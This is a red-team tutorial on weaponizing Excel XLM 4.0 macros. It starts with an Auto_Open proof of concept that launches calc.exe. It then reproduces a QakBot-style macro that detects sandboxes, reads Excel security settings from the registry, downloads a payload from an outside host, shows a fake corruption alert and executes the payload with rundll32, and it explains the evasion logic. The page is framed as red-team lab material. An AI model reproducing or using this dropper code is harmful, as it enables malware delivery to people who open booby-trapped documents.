# Weaponizing XLM 4.0 macros XLM macros a part of the Microsoft Office suite, and are an amazing resource to implement an initial foothold scenario to execute payloads in a red teaming exercise. This scenario is inspired on the following malwares that abuse XLM macro to load the first stage into the memory. {% embed url="" %} {% embed url="" %} ## Playing with XML Macros To start this laboratory, the first step is to create the XML macro inside an Excel document. **Click on "Sheet"** / **Right click** / **Add "XML Macro 4.0"** / **OK** After that, a new sheet will be created as presented below. ![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_2-EeKH4hRIQnV8Dko%2F-M_27lfnWJ_FqASjJnjJ%2Fa.gif?alt=media\&token=ed4fe74c-0f07-4e22-997d-462e8c974260) As a first test, we can execute "calc.exe" process when the macro is opened. ``` =EXEC("calc.exe") =HALT() ``` Note how we need to rename the `A1` cell to `Auto_Open` if we want the Macros to fire off once the document is opened: ![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_28EczR7RR6j3N40v_%2F-M_29ceZ2IStcGvrcfVE%2Fimage.png?alt=media\&token=1de895bf-e0ad-4e85-aa48-9dfae08d3f5a) After that, we can "save" our first PoC. Remember to save the document with Seet with privileges to execute Excel Macros (at the top of the options). ![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_28EczR7RR6j3N40v_%2F-M_2AAT9D6_a2fgu1vwm%2Fimage.png?alt=media\&token=9ca43633-a4b9-4f75-8b46-c21c63a718c6) As expected, the calc.exe is launched when the excel file is opened. :sunglasses: ![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-M_28EczR7RR6j3N40v_%2F-M_2BM8jLxtXgveeRKO-%2Fimage.png?alt=media\&token=c3d3d94e-8fb9-454f-87e4-f8916ffeb1b3) ## **Weaponizing XML macros** In order to perform a more complex scenario, we can simply adopt the approach used for instance by QakBot trojan malware. ``` =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH(“Windows”,GET.WORKSPACE(1))), ,CLOSE(TRUE)) =CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\reg.exe”,”EXPORT HKCU\Software\Microsoft\Office\”&GET.WORKSPACE(2)&”\Excel\Security c:\users\public\1.reg /y”,0,5) =WAIT(NOW()+”00:00:03″) =FOPEN(“c:\users\public\1.reg”) =FPOS(R[-1]C, 215) =FREAD(R[-2]C, 255) =FCLOSE(R[-3]C) =FILE.DELETE(“c:\users\public\1.reg”) =IF(ISNUMBER(SEARCH(“0001”,R[-3]C)),CLOSE(FALSE),) =CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\csg75ef.html”,0,0) =IF(R[-1]C<0,CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\bwep5ef.html”,0,0),) =ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it’s corrupt.”,2) =CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\rundll32.exe”,”c:\Users\Public\csg75ef.html,DllRegisterServer”,0,5) =CLOSE(FALSE) ``` The first two lines in the code are a particular highlight. These lines are actually an anti-evasion technique used to identify whether the file is facing a human or a machine (a sandbox). The GET.WORKSPACE() command gathers information about the properties of the environment. Each property is referenced by a number. The documentation for the two investigated properties is as follows: * **19:** If a mouse is present, returns TRUE; otherwise, returns FALSE. * **42:** If your computer is capable of playing sounds, returns TRUE; otherwise, return FALSE. These two properties, when being negative, are a fairly good indication for the malware to “understand” if it run inside a sandbox. Hence, the =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) statement basically means that if the code is running inside a sandbox, it needs to “bail-out”, and avoid continuing to the malicious parts of the macro. This allows the sample to evade some dynamic security products that lack the proper emulation of such characteristics. {% embed url="" %}